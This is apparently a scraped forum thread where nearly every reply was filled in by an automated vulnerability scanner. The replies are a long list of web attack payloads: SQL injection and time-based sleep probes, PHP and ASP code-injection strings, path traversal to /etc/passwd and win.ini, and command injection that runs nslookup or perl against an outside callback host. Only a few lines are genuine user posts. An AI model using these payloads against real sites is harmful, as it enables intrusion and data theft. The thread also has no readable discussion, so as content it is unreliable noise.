;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Yee How
'"
re: Yee How
';print(md5(31337));$a='
re: Yee How
<!--
re: Yee How
";print(md5(31337));$a="
re: Yee How
${@print(md5(31337))}
re: Yee How
${@print(md5(31337))}\
re: Yee How
'.print(md5(31337)).'
re: Yee How
1
re: Yee How
1
re: Yee How
-1 OR 2+762-762-1=0+0+0+1 --
re: Yee How
-1 OR 3+762-762-1=0+0+0+1 --
re: Yee How
-1 OR 2+971-971-1=0+0+0+1
re: Yee How
-1 OR 3+971-971-1=0+0+0+1
re: Yee How
-1' OR 2+361-361-1=0+0+0+1 --
re: Yee How
-1' OR 3+361-361-1=0+0+0+1 --
re: Yee How
-1' OR 2+705-705-1=0+0+0+1 or '2Czf3giC'='
re: Yee How
-1' OR 3+705-705-1=0+0+0+1 or '2Czf3giC'='
re: Yee How
-1" OR 2+309-309-1=0+0+0+1 --
re: Yee How
-1" OR 3+309-309-1=0+0+0+1 --
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
thanks for the guide!
re: ericc
rPxuefja
re: ericc
1*
re: ericc
1*
re: ericc
1*
re: ericc
1*
re: ericc
-1 OR 2+212-212-1=0+0+0+1
re: ericc
-1 OR 3+212-212-1=0+0+0+1
re: ericc
if(now()=sysdate(),sleep(15),0)
re: ericc
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: ericc
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: ericc
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: ericc
-1; waitfor delay '0:0:15' --
re: ericc
-1); waitfor delay '0:0:15' --
re: ericc
1 waitfor delay '0:0:15' --
re: ericc
Ar7ckd60'; waitfor delay '0:0:15' --
re: ericc
-5 OR 212=(SELECT 212 FROM PG_SLEEP(15))--
re: ericc
-5) OR 559=(SELECT 559 FROM PG_SLEEP(15))--
re: ericc
-1)) OR 449=(SELECT 449 FROM PG_SLEEP(15))--
re: ericc
fK0QMifX' OR 510=(SELECT 510 FROM PG_SLEEP(15))--
re: ericc
vemKNEcp') OR 261=(SELECT 261 FROM PG_SLEEP(15))--
re: ericc
Z8OkxmnU')) OR 722=(SELECT 722 FROM PG_SLEEP(15))--
re: ericc
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: ericc
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: ericc
'||(select 1 from (select pg_sleep(15))x)||'
re: ericc
''||(select 1 from (select pg_sleep(15))x)||''
re: ericc
1'"
re: ericc
@@Fb5Be
re: ericc
1Coro82IrzO
re: ericc
response.write(9474154*9466484)
re: ericc
'+response.write(9474154*9466484)+'
re: ericc
"+response.write(9474154*9466484)+"
re: ericc
%0abcc:074625.67-22245.67.82e08.19990.2@bxss.me
re: ericc
to@example.com>%0d%0abcc:074625.67-22246.67.82e08.19990.2@bxss.me
re: ericc
<esi:include src="http://bxss.me/rpb.png"/>
re: ericc
${9999970+9999951}
re: ericc
../../../../../../../../../../../../../../etc/passwd
re: ericc
../../../../../../../../../../../../../../windows/win.ini
re: ericc
file:///etc/passwd
re: ericc
../../../../../../../../../../../../../../../proc/version
re: ericc
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: ericc
../../../../../../../../../../etc/passwd%00.jpg
re: ericc
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: ericc
)
re: ericc
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: ericc
!(()&&!|*|*|
re: ericc
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: ericc
^(#$!@#$)(()))******
re: ericc
echo lkscht$()\ ecznus\nz^xyu||a #' &echo lkscht$()\ ecznus\nz^xyu||a #|" &echo lkscht$()\ ecznus\nz^xyu||a #
re: ericc
/etc/passwd
re: ericc
&echo skmpkr$()\ erszpg\nz^xyu||a #' &echo skmpkr$()\ erszpg\nz^xyu||a #|" &echo skmpkr$()\ erszpg\nz^xyu||a #
re: ericc
%2fetc%2fpasswd
re: ericc
|echo qeosai$()\ mmdjbp\nz^xyu||a #' |echo qeosai$()\ mmdjbp\nz^xyu||a #|" |echo qeosai$()\ mmdjbp\nz^xyu||a #
re: ericc
/.././.././.././.././.././.././.././../etc/./passwd%00
re: ericc
(nslookup hitpfmhutuvrpfb954.bxss.me||perl -e "gethostbyname('hitpfmhutuvrpfb954.bxss.me')")
re: ericc
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: ericc
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: ericc
$(nslookup hitpxiqokibeuc1138.bxss.me||perl -e "gethostbyname('hitpxiqokibeuc1138.bxss.me')")
re: ericc
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: ericc
'.gethostbyname(lc('hitjr'.'bsjepkpx28bc8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(68).chr(100).chr(73).'
re: ericc
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: ericc
&nslookup hitmpeoxbgztme9048.bxss.me&'\"`0&nslookup hitmpeoxbgztme9048.bxss.me&`'
re: ericc
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: ericc
".gethostbyname(lc("hitty"."liloiwqv4c732.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(89).chr(122).chr(83)."
re: ericc
Http://bxss.me/t/fit.txt
re: ericc
&(nslookup hittclwebanwj8e16a.bxss.me||perl -e "gethostbyname('hittclwebanwj8e16a.bxss.me')")&'\"`0&(nslookup hittclwebanwj8e16a.bxss.me||perl -e "gethostbyname('hittclwebanwj8e16a.bxss.me')")&`'
re: ericc
http://bxss.me/t/fit.txt%3F.jpg
re: ericc
|(nslookup hitnunncldnwbf0af4.bxss.me||perl -e "gethostbyname('hitnunncldnwbf0af4.bxss.me')")
re: ericc
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: ericc
/etc/shells
re: ericc
`(nslookup hitwojkgwomra05214.bxss.me||perl -e "gethostbyname('hitwojkgwomra05214.bxss.me')")`
re: ericc
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: ericc
;(nslookup hitbjjbgqkgmne596e.bxss.me||perl -e "gethostbyname('hitbjjbgqkgmne596e.bxss.me')")|(nslookup hitbjjbgqkgmne596e.bxss.me||perl -e "gethostbyname('hitbjjbgqkgmne596e.bxss.me')")&(nslookup hitbjjbgqkgmne596e.bxss.me||perl -e "gethostbyname('hitbjjbgqkgmne596e.bxss.me')")
re: ericc
c:/windows/win.ini
re: ericc
file:///etc/passwd
re: ericc
bxss.me
re: ericc
/\../\../\../\../\../\../\../etc/passwd
re: ericc
/WEB-INF/web.xml
re: ericc
C:\WINDOWS\system32\drivers\etc\hosts
re: ericc
HttP://bxss.me/t/xss.html?%00
re: ericc
../../../../../../../../../../windows/win.ini%00.jpg
re: ericc
bxss.me/t/xss.html?%00
re: ericc
"+"A".concat(70-3).concat(22*4).concat(106).concat(65).concat(110).concat(66)+(require"socket"
Socket.gethostbyname("hitaz"+"fttrumri76fac.bxss.me.")[3].to_s)+"
re: ericc
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: ericc
/../../../../../../../../../../boot.ini
re: ericc
'+'A'.concat(70-3).concat(22*4).concat(99).concat(68).concat(115).concat(67)+(require'socket'
Socket.gethostbyname('hitqo'+'rbfcflqkfd6cf.bxss.me.')[3].to_s)+'
re: ericc
';print(md5(31337));$a='
re: ericc
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: ericc
";print(md5(31337));$a="
re: ericc
..\..\..\..\..\..\..\..\windows\win.ini
re: ericc
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: ericc
${@print(md5(31337))}
re: ericc
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: ericc
${@print(md5(31337))}\
re: ericc
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: ericc
'.print(md5(31337)).'
re: ericc
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: ericc
'"
re: ericc
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: ericc
<!--
re: ericc
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: ericc
WEB-INF/web.xml
re: ericc
WEB-INF\web.xml
re: ericc
1
re: ericc
1
re: ericc
-1 OR 2+697-697-1=0+0+0+1 --
re: ericc
-1 OR 3+697-697-1=0+0+0+1 --
re: ericc
-1 OR 2+173-173-1=0+0+0+1
re: ericc
-1 OR 3+173-173-1=0+0+0+1
re: ericc
-1' OR 2+320-320-1=0+0+0+1 --
re: ericc
-1' OR 3+320-320-1=0+0+0+1 --
re: ericc
-1' OR 2+586-586-1=0+0+0+1 or 'tJbY7LdN'='
re: ericc
-1' OR 3+586-586-1=0+0+0+1 or 'tJbY7LdN'='
re: ericc
-1" OR 2+168-168-1=0+0+0+1 --
re: ericc
-1" OR 3+168-168-1=0+0+0+1 --
re: ericc
if(now()=sysdate(),sleep(15),0)
re: ericc
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: ericc
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: ericc
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: ericc
-1; waitfor delay '0:0:15' --
re: ericc
-1); waitfor delay '0:0:15' --
re: ericc
1 waitfor delay '0:0:15' --
Hi all, is anyone having issues trying to access the "Read more" part of each thread? Wondering if it's just me.
Also, if you create a new post, I believe you must avoid certain special characters like question marks in the title, or else your post will redirect to an "Internal Server Error"?
re: Just_Ingest
b7gv32Ww
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1 OR 2+889-889-1=0+0+0+1
re: Just_Ingest
-1 OR 3+889-889-1=0+0+0+1
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
ZmzqY3EJ'; waitfor delay '0:0:15' --
re: Just_Ingest
-5 OR 544=(SELECT 544 FROM PG_SLEEP(15))--
re: Just_Ingest
-5) OR 951=(SELECT 951 FROM PG_SLEEP(15))--
re: Just_Ingest
-1)) OR 161=(SELECT 161 FROM PG_SLEEP(15))--
re: Just_Ingest
uJqTpmZ7' OR 244=(SELECT 244 FROM PG_SLEEP(15))--
re: Just_Ingest
yrSRWMRM') OR 24=(SELECT 24 FROM PG_SLEEP(15))--
re: Just_Ingest
sFxYQxtc')) OR 46=(SELECT 46 FROM PG_SLEEP(15))--
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
@@KBxKm
re: Just_Ingest
1BMq8F7YVNO
re: Just_Ingest
%0abcc:074625.67-22239.67.5b050.19990.2@bxss.me
re: Just_Ingest
response.write(9622470*9157202)
re: Just_Ingest
to@example.com>%0d%0abcc:074625.67-22240.67.5b050.19990.2@bxss.me
re: Just_Ingest
'+response.write(9622470*9157202)+'
re: Just_Ingest
"+response.write(9622470*9157202)+"
re: Just_Ingest
<esi:include src="http://bxss.me/rpb.png"/>
re: Just_Ingest
${9999498+10000225}
re: Just_Ingest
../../../../../../../../../../../../../../etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../windows/win.ini
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../../proc/version
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Just_Ingest
)
re: Just_Ingest
../../../../../../../../../../etc/passwd%00.jpg
re: Just_Ingest
!(()&&!|*|*|
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Just_Ingest
^(#$!@#$)(()))******
re: Just_Ingest
'.gethostbyname(lc('hitep'.'frrbhkan326bb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(77).chr(100).chr(85).'
re: Just_Ingest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Just_Ingest
".gethostbyname(lc("hitbv"."shgodlag88435.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(86).chr(107).chr(87)."
re: Just_Ingest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Just_Ingest
/etc/passwd
re: Just_Ingest
echo qujmcn$()\ uqsmnp\nz^xyu||a #' &echo qujmcn$()\ uqsmnp\nz^xyu||a #|" &echo qujmcn$()\ uqsmnp\nz^xyu||a #
re: Just_Ingest
%2fetc%2fpasswd
re: Just_Ingest
&echo kpnntr$()\ idkxys\nz^xyu||a #' &echo kpnntr$()\ idkxys\nz^xyu||a #|" &echo kpnntr$()\ idkxys\nz^xyu||a #
re: Just_Ingest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Just_Ingest
|echo njkztz$()\ bzvmtc\nz^xyu||a #' |echo njkztz$()\ bzvmtc\nz^xyu||a #|" |echo njkztz$()\ bzvmtc\nz^xyu||a #
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Just_Ingest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Just_Ingest
(nslookup hitltkyyvnrwmcac03.bxss.me||perl -e "gethostbyname('hitltkyyvnrwmcac03.bxss.me')")
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Just_Ingest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Just_Ingest
"+"A".concat(70-3).concat(22*4).concat(103).concat(76).concat(108).concat(74)+(require"socket"
Socket.gethostbyname("hitdk"+"bjbfqalpf3e6b.bxss.me.")[3].to_s)+"
re: Just_Ingest
HttP://bxss.me/t/xss.html?%00
re: Just_Ingest
$(nslookup hitpuonqcuqvzb736f.bxss.me||perl -e "gethostbyname('hitpuonqcuqvzb736f.bxss.me')")
re: Just_Ingest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Just_Ingest
Http://bxss.me/t/fit.txt
re: Just_Ingest
'+'A'.concat(70-3).concat(22*4).concat(104).concat(74).concat(122).concat(66)+(require'socket'
Socket.gethostbyname('hitsn'+'wroquprl01e36.bxss.me.')[3].to_s)+'
re: Just_Ingest
bxss.me/t/xss.html?%00
re: Just_Ingest
&nslookup hithwanzjyrby9b648.bxss.me&'\"`0&nslookup hithwanzjyrby9b648.bxss.me&`'
re: Just_Ingest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Just_Ingest
http://bxss.me/t/fit.txt%3F.jpg
re: Just_Ingest
&(nslookup hitkcwsexhkvb53d0c.bxss.me||perl -e "gethostbyname('hitkcwsexhkvb53d0c.bxss.me')")&'\"`0&(nslookup hitkcwsexhkvb53d0c.bxss.me||perl -e "gethostbyname('hitkcwsexhkvb53d0c.bxss.me')")&`'
re: Just_Ingest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Just_Ingest
/etc/shells
re: Just_Ingest
|(nslookup hiteztnovfoyha31ba.bxss.me||perl -e "gethostbyname('hiteztnovfoyha31ba.bxss.me')")
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
c:/windows/win.ini
re: Just_Ingest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Just_Ingest
`(nslookup hituiislnfkkc3adb5.bxss.me||perl -e "gethostbyname('hituiislnfkkc3adb5.bxss.me')")`
re: Just_Ingest
/\../\../\../\../\../\../\../etc/passwd
re: Just_Ingest
bxss.me
re: Just_Ingest
;(nslookup hithilypbmoqw692a7.bxss.me||perl -e "gethostbyname('hithilypbmoqw692a7.bxss.me')")|(nslookup hithilypbmoqw692a7.bxss.me||perl -e "gethostbyname('hithilypbmoqw692a7.bxss.me')")&(nslookup hithilypbmoqw692a7.bxss.me||perl -e "gethostbyname('hithilypbmoqw692a7.bxss.me')")
